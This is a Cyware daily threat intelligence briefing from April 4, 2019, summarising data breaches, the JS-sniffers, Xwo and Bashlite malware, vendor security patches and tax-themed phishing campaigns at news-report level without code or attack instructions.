Go to listing page

Cyware Daily Threat Intelligence, April 04, 2019

Cyware Daily Threat Intelligence, April 04, 2019

Share Blog Post

Malicious actors never fall short of malware or attack techniques when it comes to pilfering payment card details from customers. Apparently, compromising online retail sites has become the new favorite choice for attackers. A recent report from a cybersecurity firm Group-IB has revealed that a malware family named JS-sniffers has infected 2440 e-commerce websites worldwide to capture customers’ payment data such as their card numbers, names, addresses, passwords, etc. The malware has been specifically designed to steal information from the retail sites that use Magento, OpenCart, Shopify, WooCommerce and WordPress platforms.

Two massive data leaks were also observed in the past 24 hours. In one incident, two third-party companies - Cultura Colectiva and At the Pool - exposed over 540 million Facebook records due to poorly protected AWS servers. In another incident, several unprotected ElastichSearch databases belonging to different Chinese companies have leaked over 590 million resumes. While some of these misconfigured databases have been secured, there are few that are still leaking data on the internet.

In a major data breach, unauthorized access to a web application has exposed the personal information of 1.3 million Georgia Tech’s students and staff members. The breach had occurred on December 18, 2018.  

Top Breaches Reported in the Last 24 Hours

Over 540 million Facebook records exposed
Two third-party companies have inadvertently exposed over 540 million Facebook records due to unprotected AWS servers. The companies in question are Cultura Colectiva and At the Pool. They collect a wide range of users’ data from Facebook. The data exposed in the leak are users’ account names, likes, preferences, reactions, photos, check-ins, groups, and passwords.

Over 590 million resumes leaked
Several instances of unprotected ElasticSearch databases have been discovered by security researchers recently. These vulnerable databases that belong to different Chinese companies have leaked over 590 million resumes. While the first misconfigured ElasticSearch database that contained 33 million resumes was discovered on March 10, the second ElasticSearch database containing 84.8 million CVs was spotted on March 13.  

Georgia Tech data breach
Unauthorized access to Georgia Tech’s web application has resulted in the exposure of personal information of up to 1.3 million students, and staff members. The information includes a person’s name, address, social security number, and birth date. The firm learned about the incident on March 21. However, the intruders had gained access on December 14, 2018.   

Top Malware Reported in the Last 24 Hours

JS-sniffers malware
Group-IB’s latest report has revealed that JS-sniffers infected around 2440 retail websites across the world. These affected websites witnesses nearly 1.5 million unique visitors daily and it is believed that payment card data of these customers could have been stolen. The infection process starts by injecting the malware into the websites. This enables the malware to capture the data entered by users such as their payment card numbers, names, addresses, and passwords. 

Xwo malware family
A new malware family dubbed Xwo has been found scanning for exposed web services and default passwords. The malware is based on two existing malware - Xbash and MongoLock. Although the propagation method of the malware is still unknown, experts believe that it communicates with the C2 server to send back information from infected machines through an HTTP POST request.

Bashlite botnet updated
Security researchers have uncovered a new version of Bashlite botnet that targets WeMo devices. The botnet includes mining and backdoor features. The malware can also deliver other malware that removes competing botnet from the systems. It abuses a publicly available remote-code execution (RCE) Metasploit module for propagation. 

Top Vulnerabilities Reported in the Last 24 Hours

NVIDIA releases security updates
NVIDIA has released security updates to fix vulnerabilities in Linux4Tegra Driver for Jetson AI supercomputers. The vulnerabilities are tracked as CVE?2018?6269, CVE-2017-6278, CVE-2018-6267 and CVE-2018-6271. They could allow attackers basic user privileges to elevate privileges and to perform denial-of-service (DoS) or information disclosure attacks.

Huawei patches a bug
Huawei has patched a serious bug that affected its MateBook laptops. The bug was discovered by Microsoft and is related to the company’s PCManager software that appears to act like an NSA-styled malware. The flaw could allow attackers to take control of the systems.

Mozilla and Google patch a bug
A security flaw in Mozilla Firefox and Google Chrome is believed to have affected more than 300 million users, according to Aura, a New Zealand government-owned tech company. The bug allowed hackers to access a user’s sensitive photos and documents uploaded to websites. Both Google and Mozilla have confirmed about the bug and have released a security patch as well. Therefore, users are advised to follow their browser's software update process to stay up-to-date.  

Top Scams Reported in the Last 24 Hours

Tax-themed scams
Researchers have discovered several instances of tax-themed scams that lure users into revealing their personal and financial information. One of the incidents involves a phishing campaign that was used to distribute NetWire malware in September and October, 2018 and later in early February, 2019. The campaign targeted users in Australia, Canada, and the United States. The emails were sent with subject lines that read, ‘Notice of Outstanding Income Tax Demand’, ‘IRS Update for 1099 Employees’, ‘2018 EF Tax Incentive Billing’ and ‘Your IRAS 2018 Tax Report’. In another incident, the NetWire malware was dropped via emails pretending to be from Canada Post and New Zealand Inland Revenue Department.


tax themed scams
js sniffers malware
xwo malware
xbash malware
bashlite botnet
unprotected elasticsearch databases
unprotected aws servers

Posted on: April 04, 2019

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.

The Virtual Cyber Fusion Suite